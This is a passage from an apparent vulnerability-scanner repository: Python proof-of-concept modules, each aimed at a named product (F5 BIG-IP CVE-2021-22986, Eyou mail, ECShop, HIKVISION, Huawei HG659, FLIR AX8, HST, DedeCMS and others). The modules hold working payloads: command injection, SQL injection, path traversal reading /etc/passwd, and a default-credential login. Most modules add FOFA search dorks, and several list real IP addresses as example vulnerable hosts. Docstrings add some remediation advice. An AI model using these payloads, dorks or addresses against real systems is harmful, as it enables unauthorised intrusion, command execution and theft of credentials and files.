    """Configuration-export exposure check for the China Mobile "Yu" router.

    Issues one GET to ``/cgi-bin/ExportSettings.sh`` and reports a hit when
    the reply is HTTP 200 and contains ``The following line``, ``Login`` and
    ``Password``. A hit means the device hands out its settings file without
    authentication; update firmware and disable WAN-side management.
    """

    _info = {
        "author": "jijue",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2021-06-09",  # POC creation date
        "UpdateDate": "2021-06-09",  # POC last-updated date
        "PocDesc": """
略
""",  # POC description / update notes ("略" = omitted)
        "name": "中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞",  # vulnerability name
        "VulnID": "oFx-2021-0001",  # project-internal id; the same value is reused by several POCs in this repo
        "AppName": "中国移动 禹路由",  # affected application
        "AppVersion": "",  # affected versions
        "VulnDate": "2021-06-09",  # disclosure date, format xxxx-xx-xx (today if unknown)
        "VulnDesc": """
中国移动 禹路由 ExportSettings.sh 存在敏感信息泄露漏洞,
攻击者通过漏洞获取配置文件,其中包含账号密码等敏感信息
""",  # brief vulnerability description
        "fofa-dork": """
title="互联世界 物联未来-登录"
""",  # FOFA search query
        "example": "",  # demo URL of a vulnerable instance (one is enough)
        "exp_img": "",  # not used yet
    }

    def _verify(self):
        """Fetch the export script and return ``[is_vulnerable, body]``.

        Returns:
            list: ``[True, body]`` on a hit, ``[False, body]`` otherwise; the
            honeypot filter may flip a hit back to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged.
        """
        export_url = self.target + "/cgi-bin/ExportSettings.sh"
        request_headers = {
            "User-Agent": get_random_ua(),
            "Connection": "close",
        }

        resp = requests.get(
            export_url,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,  # no class-level override here; comes from the base
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        body = resp.text
        settings_exposed = (
            "The following line" in body
            and "Login" in body
            and "Password" in body
            and resp.status_code == 200
        )
        result = [True, body] if settings_exposed else [False, body]

        # Use as appropriate: honeypot responses are demoted. ``== True`` is
        # kept as authored; _honeypot_check's return type is not visible here.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/DedeCMS_织梦/RadminPass/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """Leftover-tool check for DedeCMS: is ``radminpass.php`` still deployed?

    Issues one GET to ``/radminpass.php`` and reports a hit when the body
    contains ``http://yousite/radminpass.php``. VulnDesc explains the file is
    a password-reset helper that site owners often forget to delete; the
    remediation is simply to remove it from the web root.
    """

    _info = {
        "author": "jijue",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2021-06-09",  # POC creation date
        "UpdateDate": "2021-06-09",  # POC last-updated date
        "PocDesc": """
略
""",  # POC description / update notes ("略" = omitted)
        "name": "织梦CMS radminpass.php文件暴露",  # vulnerability name
        "VulnID": "oFx-2021-0001",  # project-internal id; the same value is reused by several POCs in this repo
        "AppName": "dedecms",  # affected application
        "AppVersion": "",  # affected versions
        "VulnDate": "2021-06-09",  # disclosure date, format xxxx-xx-xx (today if unknown)
        "VulnDesc": """
radminpass.php文件是一个用于修改管理员密码的PHP脚本工具
多出现在新手站长用过这个工具以后忘记删了
""",  # brief vulnerability description
        "fofa-dork": """
app="DedeCMS"
""",  # FOFA search query
        "example": "",  # demo URL of a vulnerable instance (one is enough)
        "exp_img": "",  # not used yet
    }

    def _verify(self):
        """Fetch the helper script and return ``[is_vulnerable, body]``.

        Returns:
            list: ``[True, body]`` when the marker text is present (status
            code is not checked, as authored), otherwise ``[False, body]``;
            the honeypot filter may flip a hit to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged.
        """
        helper_url = self.target + "/radminpass.php"
        request_headers = {
            "User-Agent": get_random_ua(),
            "Connection": "close",
        }

        resp = requests.get(
            helper_url,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,  # no class-level override here; comes from the base
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        helper_present = "http://yousite/radminpass.php" in resp.text
        result = [True, resp.text] if helper_present else [False, resp.text]

        # Use as appropriate: honeypot responses are demoted. ``== True`` is
        # kept as authored; _honeypot_check's return type is not visible here.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/ECShop/SQLi_delete_cart_goods/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """Error-based SQL injection check for ECShop ``delete_cart_goods.php`` (CNVD-2020-58823).

    Posts the fixed form body the POC was authored with and reports a hit
    when the page echoes ``MySQL server error report``. A hit means the
    parameter reaches the database unescaped and errors are displayed;
    patch past 4.1.0 and turn off verbose database error output.
    """

    _info = {
        "author": "jijue",  # POC author
        "version": "2",  # POC version, defaults to 1
        "CreateDate": "2021-06-09",  # POC creation date
        "UpdateDate": "2021-06-09",  # POC last-updated date
        "PocDesc": """
v1 : 略
v2 : 小改进
""",  # POC description / update notes (v1: omitted; v2: minor improvement)
        "name": "ECShop 4.1.0前台 delete_cart_goods.php SQL注入(CNVD-2020-58823)",  # vulnerability name
        "VulnID": "CNVD-2020-58823",  # vulnerability id: CVE preferred, else CNVD, else blank
        "AppName": "ECShop",  # affected application
        "AppVersion": "ecshop4.1.0及以下",  # affected versions (4.1.0 and below)
        "VulnDate": "2021-06-09",  # disclosure date, format xxxx-xx-xx (today if unknown)
        "VulnDesc": """

""",  # brief vulnerability description (left empty by the author)
        "fofa-dork": """
app="ECShop"
""",  # FOFA search query
        "example": "",  # demo URL of a vulnerable instance (one is enough)
        "exp_img": "",  # not used yet
    }

    def _verify(self):
        """Post the authored body and return ``[is_vulnerable, body]``.

        Returns:
            list: ``[True, body]`` when the MySQL error banner appears
            (status code is not checked, as authored), otherwise
            ``[False, body]``; the honeypot filter may flip a hit to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged.
        """
        cart_endpoint = self.target + "/delete_cart_goods.php"
        # Fixed request body as authored.
        form_body = "id=0||(updatexml(1,concat(0x7e,(select%20user()),0x7e),1))"
        request_headers = {
            "User-Agent": get_random_ua(),
            "Connection": "close",
            "Content-Type": "application/x-www-form-urlencoded",
        }

        resp = requests.post(
            cart_endpoint,
            data=form_body,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,  # no class-level override here; comes from the base
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        db_error_shown = "MySQL server error report" in resp.text
        result = [True, resp.text] if db_error_shown else [False, resp.text]

        # Use as appropriate: honeypot responses are demoted. ``== True`` is
        # kept as authored; _honeypot_check's return type is not visible here.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/Eyou_亿邮/RCE_moni_detail/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """Command-execution check for the Eyou mail system ``moni_detail.do`` endpoint.

    Posts the fixed body the POC was authored with to
    ``/webadm/?q=moni_detail.do&action=gragh`` and reports a hit when the
    reply is HTTP 200 and contains ``root:/root``. A hit means the endpoint
    passes request input to a shell; patch the product and block the
    ``/webadm/`` path from untrusted networks.
    """

    _info = {
        "author": "hansi",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2021-06-09",  # POC creation date
        "UpdateDate": "2021-06-09",  # POC last-updated date
        "PocDesc": """
略
""",  # POC description / update notes ("略" = omitted)
        "name": "亿邮电子邮件系统 远程命令执行",  # vulnerability name
        "VulnID": "",  # vulnerability id: CVE preferred, else CNVD, else blank
        "AppName": "Eyou 亿邮电子邮件系统",  # affected application
        "AppVersion": "",  # affected versions
        "VulnDate": "2021-06-09",  # disclosure date, format xxxx-xx-xx (today if unknown)
        "VulnDesc": """

""",  # brief vulnerability description (left empty by the author)
        "fofa-dork": """
body="亿邮电子邮件系统"

title="亿邮电子邮件系统"
""",  # FOFA search query
        "example": "https://59.63.125.111:443",  # demo URL of a vulnerable instance
        "exp_img": "",  # not used yet
    }

    def _verify(self):
        """Post the authored body and return ``[is_vulnerable, body]``.

        Returns:
            list: ``[True, body]`` on a hit, ``[False, body]`` otherwise; the
            honeypot filter may flip a hit back to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged.
        """
        graph_endpoint = self.target + "/webadm/?q=moni_detail.do&action=gragh"
        request_headers = {
            "User-Agent": get_random_ua(),
            "Connection": "close",
            "Content-Type": "application/x-www-form-urlencoded",
        }
        # Fixed request body as authored.
        form_body = "type='|cat /etc/passwd||'"

        resp = requests.post(
            graph_endpoint,
            headers=request_headers,
            data=form_body,
            proxies=self.proxy,
            timeout=self.timeout,  # no class-level override here; comes from the base
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        output_echoed = resp.status_code == 200 and "root:/root" in resp.text
        result = [True, resp.text] if output_echoed else [False, resp.text]

        # Use as appropriate: honeypot responses are demoted. ``== True`` is
        # kept as authored; _honeypot_check's return type is not visible here.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/F5_BIG_IP/RCE_CVE_2021-22986/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """Authentication-bypass / command-execution check for F5 BIG-IP iControl REST (CVE-2021-22986).

    Posts the fixed JSON body the POC was authored with to
    ``/mgmt/tm/util/bash``, using the fixed Authorization and empty
    ``X-F5-Auth-Token`` headers as authored, and reports a hit when the
    reply is HTTP 200 and contains ``root:/root``. A hit means the
    management REST interface runs commands without valid credentials;
    apply the vendor fix and keep the management plane off untrusted networks.
    """

    _info = {
        "author": "jijue",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2021-06-09",  # POC creation date
        "UpdateDate": "2021-06-09",  # POC last-updated date
        "PocDesc": """
略
""",  # POC description / update notes ("略" = omitted)
        "name": "CVE-2021-22986 RCE",  # vulnerability name
        "VulnID": "oFx-2021-0001",  # NOTE(review): project-internal placeholder although a CVE id is named in "name"
        "AppName": "",  # affected application
        "AppVersion": "",  # affected versions
        "VulnDate": "2021-06-09",  # disclosure date, format xxxx-xx-xx (today if unknown)
        "VulnDesc": """

""",  # brief vulnerability description (left empty by the author)
        "fofa-dork": """
title="BIG-IP&reg;"
""",  # FOFA search query
        "example": "",  # demo URL of a vulnerable instance (one is enough)
        "exp_img": "",  # not used yet
    }

    def _verify(self):
        """Post the authored body and return ``[is_vulnerable, body]``.

        Returns:
            list: ``[True, body]`` on a hit, ``[False, body]`` otherwise; the
            honeypot filter may flip a hit back to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged.
        """
        bash_endpoint = self.target + "/mgmt/tm/util/bash"
        # Fixed JSON request body as authored (raw literal).
        json_body = r'''{"command": "run", "utilCmdArgs": "-c 'cat /etc/passwd'"}'''
        request_headers = {
            "User-Agent": get_random_ua(),
            "Accept": "*/*",
            "Connection": "close",
            "Authorization": "Basic YWRtaW46",  # fixed credential header as authored
            "X-F5-Auth-Token": "",  # deliberately empty as authored
            "Content-Type": "application/json",
        }

        resp = requests.post(
            bash_endpoint,
            data=json_body,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,  # no class-level override here; comes from the base
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        output_echoed = "root:/root" in resp.text and resp.status_code == 200
        result = [True, resp.text] if output_echoed else [False, resp.text]

        # Use as appropriate: honeypot responses are demoted. ``== True`` is
        # kept as authored; _honeypot_check's return type is not visible here.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/FLIR_菲力尔/Download_File_AX8/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """Arbitrary-file-download check for FLIR AX8 ``download.php``.

    Issues one GET to ``/download.php?file=/etc/passwd`` and reports a hit
    when the reply is HTTP 200 and contains ``root:x``. A hit means the
    download handler does not restrict the requested path (VulnDesc:
    incomplete filtering); update the camera firmware and keep the web
    interface off untrusted networks.
    """

    _info = {
        "author": "jijue",  # POC author
        "version": "1",  # POC version, defaults to 1
        "CreateDate": "2021-06-09",  # POC creation date
        "UpdateDate": "2021-06-09",  # POC last-updated date
        "PocDesc": """
略
""",  # POC description / update notes ("略" = omitted)
        "name": "FLIR-AX8 download.php 任意文件下载",  # vulnerability name
        "VulnID": "oFx-2021-0001",  # project-internal id; the same value is reused by several POCs in this repo
        "AppName": "FLIR-AX8",  # affected application
        "AppVersion": "",  # affected versions
        "VulnDate": "2021-06-09",  # disclosure date, format xxxx-xx-xx (today if unknown)
        "VulnDesc": """
FLIR-AX8 download.php文件过滤不全 存在任意文件下载漏洞
""",  # brief vulnerability description
        "fofa-dork": """
app="FLIR-FLIR-AX8"
""",  # FOFA search query
        "example": "http://124.103.98.183:82",  # demo URL of a vulnerable instance
        "exp_img": "",  # not used yet
    }

    def _verify(self):
        """Request the download handler and return ``[is_vulnerable, body]``.

        Returns:
            list: ``[True, body]`` on a hit, ``[False, body]`` otherwise; the
            honeypot filter may flip a hit back to ``False``.

        Raises:
            Any exception from the HTTP call propagates unchanged.
        """
        download_url = self.target + "/download.php?file=/etc/passwd"
        request_headers = {
            "User-Agent": get_random_ua(),
            "Connection": "close",
        }

        resp = requests.get(
            download_url,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,  # no class-level override here; comes from the base
            verify=False,  # as authored; urllib3 warning silenced at import
        )
        file_returned = "root:x" in resp.text and resp.status_code == 200
        result = [True, resp.text] if file_returned else [False, resp.text]

        # Use as appropriate: honeypot responses are demoted. ``== True`` is
        # kept as authored; _honeypot_check's return type is not visible here.
        if self._honeypot_check(result[1]) == True:
            result[0] = False

        return result

    def _attack(self):
        """No separate exploit step; attack mode re-runs _verify."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/H5S_视频平台/Info_Disclosure/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
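class POC(POCBase):
    """H5S video platform ``/api/v1/GetSrc`` information disclosure check.

    One unauthenticated GET; a 200 response whose body contains all three
    markers ``src``, ``nType`` and ``strName`` is a hit. Certificate
    verification is disabled (``verify=False``). ``_info`` is metadata
    consumed elsewhere in the project (``POCBase`` is not visible here).

    Two defects fixed here: the marker test was written as
    ``"src" and "nType" and "strName" in req.text``, which only tests the
    last marker (the first two are non-empty literals and always truthy);
    and a stray comma after ``"fofa-dork": ""`` made the dork text
    concatenate onto the ``"example"`` key, so neither entry existed.
    """

    _info = {
        "author": "hansi",
        "version": "1",
        "CreateDate": "2022-1-10",
        "UpdateDate": "2022-1-10",
        "PocDesc": "\n该系统存在查询信息接口,泄露大量敏感信息\n\n",
        "name": "H5S视频平台api信息泄露漏洞",
        "VulnID": "",  # no CVE/CNVD given
        "AppName": "H5S视频平台",
        "AppVersion": "无",
        "VulnDate": "2021-03-10",
        "VulnDesc": "\n\n",
        # Restored as two separate entries (see class docstring).
        "fofa-dork": "\nH5S视频平台\n",
        "example": "",
        "exp_img": "",
    }

    # Body substrings that must all be present for a positive result.
    _MARKERS = ("src", "nType", "strName")

    def _verify(self):
        """Return ``[is_vulnerable, response_text]``.

        ``[True, body]`` when status is 200 and every marker in
        ``_MARKERS`` is present, ``[False, body]`` otherwise. ``requests``
        exceptions propagate. A hit is demoted to ``False`` when
        ``self._honeypot_check`` flags the body.
        """
        target_url = self.target + "/api/v1/GetSrc"
        request_headers = {
            "User-Agent": get_random_ua(),
            "Connection": "close",
            "Content-Type": "application/x-www-form-urlencoded",
        }
        resp = requests.get(
            target_url,
            headers=request_headers,
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # target certificate is not checked
        )
        body = resp.text
        # Each marker is tested individually (previously only "strName" was).
        all_markers = all(marker in body for marker in self._MARKERS)
        hit = all_markers and resp.status_code == 200
        outcome = [hit, body]
        # "== True" kept: the base-class return type is not visible here.
        if self._honeypot_check(body) == True:
            outcome[0] = False
        return outcome

    def _attack(self):
        """Attack mode is the same single request as verify mode."""
        return self._verify()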
--------------------------------------------------------------------------------
/poc/HIKVISION/File_Down_Gateway_downFile_php/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """HIKVISION video-access gateway ``downFile.php`` file download check.

    The request asks ``/serverLog/downFile.php`` to return its own source
    through the ``fileName`` parameter; a 200 response containing the PHP
    variable name ``$file_name`` is a hit. Certificate verification is
    disabled (``verify=False``). ``_info`` is metadata consumed elsewhere
    in the project (``POCBase`` is not visible here).
    """

    _info = {
        "author": "jijue",
        "version": "1",
        "CreateDate": "2021-06-09",
        "UpdateDate": "2021-06-09",
        "PocDesc": "\n略\n",  # "略" = omitted
        "name": "HIKVISION 视频编码设备接入网关 任意文件下载",
        "VulnID": "oFx-2021-0001",  # project-local id; no CVE/CNVD given
        "AppName": "海康威视视频接入网关系统",
        "AppVersion": "",
        "VulnDate": "2021-06-09",
        "VulnDesc": "\n海康威视视频接入网关系统在页面/serverLog/downFile.php的参数fileName存在任意文件下载漏洞\n",
        "fofa-dork": '\ntitle="视频编码设备接入网关"\n',
        "example": "http://211.137.239.52:7288",
        "exp_img": "",
    }

    def _verify(self):
        """Return ``[is_vulnerable, response_text]``.

        ``[True, body]`` when status is 200 and ``$file_name`` is in the
        body, ``[False, body]`` otherwise. ``requests`` exceptions
        propagate. A hit is demoted to ``False`` when
        ``self._honeypot_check`` flags the body.
        """
        path = "/serverLog/downFile.php?fileName=../web/html/serverLog/downFile.php"
        response = requests.get(
            self.target + path,
            headers={"User-Agent": get_random_ua(), "Connection": "close"},
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # target certificate is not checked
        )
        page = response.text
        matched = "$file_name" in page and response.status_code == 200
        result = [matched, page]
        # "== True" kept: the base-class return type is not visible here.
        if self._honeypot_check(page) == True:
            result[0] = False
        return result

    def _attack(self):
        """Attack mode is the same single request as verify mode."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/HIKVISION/Weak_Pass_Stream_Media_Manager/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """HIKVISION streaming media manager default-credential check.

    POSTs one fixed, base64-encoded username/password pair to
    ``/data/login.php``; a 200 response whose entire body is ``0`` is a
    hit. Certificate verification is disabled (``verify=False``).
    ``_info`` is metadata consumed elsewhere in the project (``POCBase``
    is not visible here).
    """

    _info = {
        "author": "jijue",
        "version": "1",
        "CreateDate": "2021-06-09",
        "UpdateDate": "2021-06-09",
        "PocDesc": "\n略\n",  # "略" = omitted
        "name": "HIKVISION 流媒体管理服务器弱口令",
        "VulnID": "oFx-2021-0001",  # project-local id; no CVE/CNVD given
        "AppName": "HIKVISION 流媒体管理服务器",
        "AppVersion": "",
        "VulnDate": "2021-06-09",
        "VulnDesc": "\n略\n",
        "fofa-dork": '\ntitle="流媒体管理服务器"\n',
        "example": "http://112.53.234.26:7788",
        "exp_img": "",
    }

    def _verify(self):
        """Return ``[is_vulnerable, response_text]``.

        ``[True, body]`` when status is 200 and the body equals ``"0"``
        exactly, ``[False, body]`` otherwise. ``requests`` exceptions
        propagate. A hit is demoted to ``False`` when
        ``self._honeypot_check`` flags the body.
        """
        login_url = self.target + "/data/login.php"
        form = "userName=YWRtaW4=&password=MTIzNDU="
        response = requests.post(
            login_url,
            data=form,
            headers={
                "User-Agent": get_random_ua(),
                "Connection": "close",
                "Content-Type": "application/x-www-form-urlencoded",
            },
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # target certificate is not checked
        )
        page = response.text
        matched = response.status_code == 200 and page == "0"
        result = [matched, page]
        # "== True" kept: the base-class return type is not visible here.
        if self._honeypot_check(page) == True:
            result[0] = False
        return result

    def _attack(self):
        """Attack mode is the same single request as verify mode."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/HST_好视通/File_Download/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """HST (好视通) ``toDownload.do`` arbitrary file download check.

    One unauthenticated GET requests ``windows/win.ini`` through the
    ``fileName`` parameter; a 200 response containing the win.ini comment
    ``; for 16-bit app support`` is a hit. Certificate verification is
    disabled (``verify=False``). ``_info`` is metadata consumed elsewhere
    in the project (``POCBase`` is not visible here).
    """

    _info = {
        "author": "jijue",
        "version": "1",
        "CreateDate": "2021-06-09",
        "UpdateDate": "2021-06-09",
        "PocDesc": "\n略\n",  # "略" = omitted
        "name": "好视通视频会议平台 任意文件下载",
        "VulnID": "oFx-2021-0001",  # project-local id; no CVE/CNVD given
        "AppName": "好视通视频会议平台",
        "AppVersion": "",
        "VulnDate": "2021-06-09",
        "VulnDesc": "\n\n",
        "fofa-dork": '\napp="好视通-视频会议"\n',
        "example": "",
        "exp_img": "",
    }

    def _verify(self):
        """Return ``[is_vulnerable, response_text]``.

        ``[True, body]`` when status is 200 and the win.ini marker is in
        the body, ``[False, body]`` otherwise. ``requests`` exceptions
        propagate. A hit is demoted to ``False`` when
        ``self._honeypot_check`` flags the body.
        """
        path = "/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini"
        response = requests.get(
            self.target + path,
            headers={"User-Agent": get_random_ua(), "Connection": "close"},
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # target certificate is not checked
        )
        page = response.text
        matched = "; for 16-bit app support" in page and response.status_code == 200
        result = [matched, page]
        # "== True" kept: the base-class return type is not visible here.
        if self._honeypot_check(page) == True:
            result[0] = False
        return result

    def _attack(self):
        """Attack mode is the same single request as verify mode."""
        return self._verify()
--------------------------------------------------------------------------------
/poc/HST_好视通/File_Read/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
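class POC(POCBase):
    """HST (好视通) ``toDownload.do`` arbitrary file read check.

    One unauthenticated GET requests ``FMServer/ServiceConfig.xml``
    through the ``fileName`` parameter; a 200 response containing both
    ``fastmeeting`` and ``live_ice.cfg`` is a hit. Certificate
    verification is disabled (``verify=False``). ``_info`` is metadata
    consumed elsewhere in the project (``POCBase`` is not visible here).

    Defect fixed here: the marker test was written as
    ``"fastmeeting" and "live_ice.cfg" in req.text``, which only tests
    ``live_ice.cfg`` (the first literal is always truthy). Both markers are
    now tested. The path is also a raw string so its backslashes are not
    mis-read as escapes; the resulting value is unchanged.
    """

    _info = {
        "author": "jijue",
        "version": "1",
        "CreateDate": "2022-09-20",
        "UpdateDate": "2022-09-20",
        "PocDesc": "\n略\n",  # "略" = omitted
        "name": "好视通视频平台 任意文件读取",
        "VulnID": "oFx-2022-0003",  # project-local id; no CVE/CNVD given
        "AppName": "好视通视频会议平台",
        "AppVersion": "",
        "VulnDate": "2022-09-20",
        "VulnDesc": "\n\n",
        "fofa-dork": '\napp="好视通-视频会议"\n',
        "example": "",
        "exp_img": "",
    }

    # Body substrings that must all be present for a positive result.
    _MARKERS = ("fastmeeting", "live_ice.cfg")

    def _verify(self):
        """Return ``[is_vulnerable, response_text]``.

        ``[True, body]`` when status is 200 and every marker in
        ``_MARKERS`` is present, ``[False, body]`` otherwise. ``requests``
        exceptions propagate. A hit is demoted to ``False`` when
        ``self._honeypot_check`` flags the body.
        """
        path = r"/register/toDownload.do?fileName=..\..\..\..\FMServer/ServiceConfig.xml"
        response = requests.get(
            self.target + path,
            headers={"User-Agent": get_random_ua(), "Connection": "close"},
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # target certificate is not checked
        )
        page = response.text
        # Each marker is tested individually (previously only the last was).
        all_markers = all(marker in page for marker in self._MARKERS)
        matched = all_markers and response.status_code == 200
        result = [matched, page]
        # "== True" kept: the base-class return type is not visible here.
        if self._honeypot_check(page) == True:
            result[0] = False
        return result

    def _attack(self):
        """Attack mode is the same single request as verify mode."""
        return self._verify()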
73 |
--------------------------------------------------------------------------------
/poc/HT_华天OA/Sqli_ApiController/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """华天动力 OA ``HtClientServlet2`` SQL injection check.

    POSTs one fixed ``getChat`` form whose ``receiver`` value carries a
    tautology; a 200 response containing ``W3siY29udGVudCI6`` (which
    looks like a base64 prefix of a JSON array — not confirmed on this
    page) is a hit. Certificate verification is disabled
    (``verify=False``). ``_info`` is metadata consumed elsewhere in the
    project (``POCBase`` is not visible here).
    """

    _info = {
        "author": "hansi",
        "version": "1",
        "CreateDate": "2022-10-11",
        "UpdateDate": "2022-10-11",
        "PocDesc": "\n\n",
        "name": "华天动力OAsql注入漏洞",
        "VulnID": "oFx-2022-1011",  # project-local id; no CVE/CNVD given
        "AppName": "",
        "AppVersion": "",
        "VulnDate": "2022-10-11",
        "VulnDesc": "\n\n",
        "fofa-dork": '\napp="华天动力-OA8000"\n',
        "example": "http://14.29.237.26:88/",
        "exp_img": "",
    }

    def _verify(self):
        """Return ``[is_vulnerable, response_text]``.

        ``[True, body]`` when status is 200 and the marker is in the body,
        ``[False, body]`` otherwise. ``requests`` exceptions propagate.
        A hit is demoted to ``False`` when ``self._honeypot_check`` flags
        the body.
        """
        servlet_url = self.target + "/OAapp/HtClientServlet2"
        form = "command=getChat&receiver='%20or%201=1%20or%20''='"
        response = requests.post(
            servlet_url,
            headers={
                "User-Agent": get_random_ua(),
                "Connection": "close",
                "Content-Type": "application/x-www-form-urlencoded",
            },
            data=form,
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # target certificate is not checked
        )
        page = response.text
        matched = response.status_code == 200 and "W3siY29udGVudCI6" in page
        result = [matched, page]
        # "== True" kept: the base-class return type is not visible here.
        if self._honeypot_check(page) == True:
            result[0] = False
        return result

    def _attack(self):
        """Attack mode is the same single request as verify mode."""
        return self._verify()
74 |
--------------------------------------------------------------------------------
/poc/Huawei/File_Read_HG659_lib/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
class POC(POCBase):
    """Huawei HG659 ``/lib`` arbitrary file read check.

    One unauthenticated GET for a traversal path under ``/lib``; a body
    containing ``root:x:0`` is a hit. Unlike most sibling POCs, the HTTP
    status is NOT checked (that clause is commented out in the original).
    Certificate verification is disabled (``verify=False``). ``_info`` is
    metadata consumed elsewhere in the project (``POCBase`` is not
    visible here).
    """

    _info = {
        "author": "jijue",
        "version": "1",
        "CreateDate": "2021-06-09",
        "UpdateDate": "2021-06-09",
        "PocDesc": "\n略\n",  # "略" = omitted
        "name": "Huawei HG659 lib 任意文件读取漏洞",
        "VulnID": "oFx-2021-0001",  # project-local id; no CVE/CNVD given
        "AppName": "Huawei HG659",
        "AppVersion": "",
        "VulnDate": "2021-06-09",
        "VulnDesc": "\nHuawei HG659 lib 存在任意文件读取漏洞,攻击者通过漏洞可以读取任意文件\n",
        "fofa-dork": '\napp="HUAWEI-Home-Gateway-HG659"\n',
        "example": "https://121.74.170.192:443",
        "exp_img": "",
    }

    def _verify(self):
        """Return ``[is_vulnerable, response_text]``.

        ``[True, body]`` when ``root:x:0`` is in the body (any status),
        ``[False, body]`` otherwise. ``requests`` exceptions propagate.
        A hit is demoted to ``False`` when ``self._honeypot_check`` flags
        the body.
        """
        path = "/lib///....//....//....//....//....//....//....//....//etc//passwd"
        response = requests.get(
            self.target + path,
            headers={"User-Agent": get_random_ua(), "Connection": "close"},
            proxies=self.proxy,
            timeout=self.timeout,
            verify=False,  # target certificate is not checked
        )
        page = response.text
        # Status code deliberately not consulted, matching the original.
        result = ["root:x:0" in page, page]
        # "== True" kept: the base-class return type is not visible here.
        if self._honeypot_check(page) == True:
            result[0] = False
        return result

    def _attack(self):
        """Attack mode is the same single request as verify mode."""
